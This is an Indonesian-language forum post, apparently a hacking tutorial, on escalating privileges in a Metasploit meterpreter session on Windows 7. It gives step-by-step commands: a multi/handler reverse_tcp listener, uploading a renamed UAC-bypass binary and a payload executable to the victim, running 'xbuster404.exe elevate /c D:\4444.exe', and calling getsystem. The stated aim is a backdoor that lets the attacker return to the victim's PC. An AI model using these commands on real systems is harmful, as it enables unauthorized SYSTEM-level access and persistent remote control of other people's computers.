05-24-2013, 03:49 PM
Disini saya harap kalian sudah masuk sesi meterpreter
dan apa yang kita lakukan setelah dapat sesi meterpreter
banyak cara yang kita lakukan ketika kita berada pada sesi meterpreter ini
hmmm...yup kita akan mengupload backdoor agar kita bisa masuk ke pc korban lagi tanpa mengexploitnya
tapi kendala masih saja ada yaitu tidak bisa upload backdoor kita
percobaan dengan menggunakan 2 laptop 1 pc
1 pc = menggunakan single boot dengan os backtrack 5 r3 (ATTACKER)
1 laptop = menggunakan single boot windows 7
1 laptop = menggunakan triple boot backtrack 5 r3 , xp sp3 , windows 7 SP 1
dengan keterangan error access denied atau kita ditolak masuk ke system tersebut
ok langsung saja kita mencoba masuk systemnya apabila belum di patch tu windows nya
disini saya harap sudah ada pada meterpreter
lalu ketikkan perintah
getsystem
untuk masuk kesistem
dan coba upload kan lagi backdoor kalian
lalu kita coba test pada windows 7 yang sudah di patch
DAN JIKA WINDOWS 7 SUDAH DI PATCH alias korban memakai windows 7 sp1
maka ketika kita mau mendapatkan system dengan getsystem maka access denied
dan muncul pesan error pada windows korban
hmmm berarti windosnya bener2 sudah di patch ni
disini kita harus sudah masuk meterpreter dulu sebelum membypass nya
dan cara untuk mengakalinya dengan menggunakan tehnik bypass.exe yang ada pada folder /opt/metasploit/msf3/data/post
[b]buka lagi [/b]msfconsole
lalu buat exploit multi handler
use exploit/multi/handler
set payload windows meterpreter/reverse_tcp
set lhost 192.168.1.73
exploit
lalu bikin payload multi handler dan simpan pada desktop beri nama 4444.exe
buka terminal baru masukkan perintah
cd /opt/metasploit/msf3/data/post
disana kita kana melihat bypass nya
dan sekarang copy bypass nya pada desktop dan rename nya disini korban menggunakan 32bit dan saya rename bypassnya dengan nama xbuster404.exe
nah hasilnya kita punya 2 file di desktop
setelah itu kita cari dulu hasil exploitnya yang mengizinkan kita masuk pada session meterpreter yang dulu
dengan perintah pwd
ternyata exploit kita masuk pada d:
sekarang mulailah kita upload bypass yang telah kita rename tadi di desktop
upload /root/Desktop/xbuster404.exe D:\
lalu upload juga payload yang telah kita buat sebelumnya
upload /root/Desktop/4444.exe D:\
sekarang kita masuk cmd korban untuk mengesekusinya menggunkan perintah
shell
lalu eksekusi payload dibawah bypass dengan perintah
xbuster404.exe elevate /c D:\4444.exe
dan beralihlah pada console kedua (msfconsole yang baru dibuat tadi) dan coba untuk dapatkan systemnya dengan perintah
getsystem
woowwww work
:>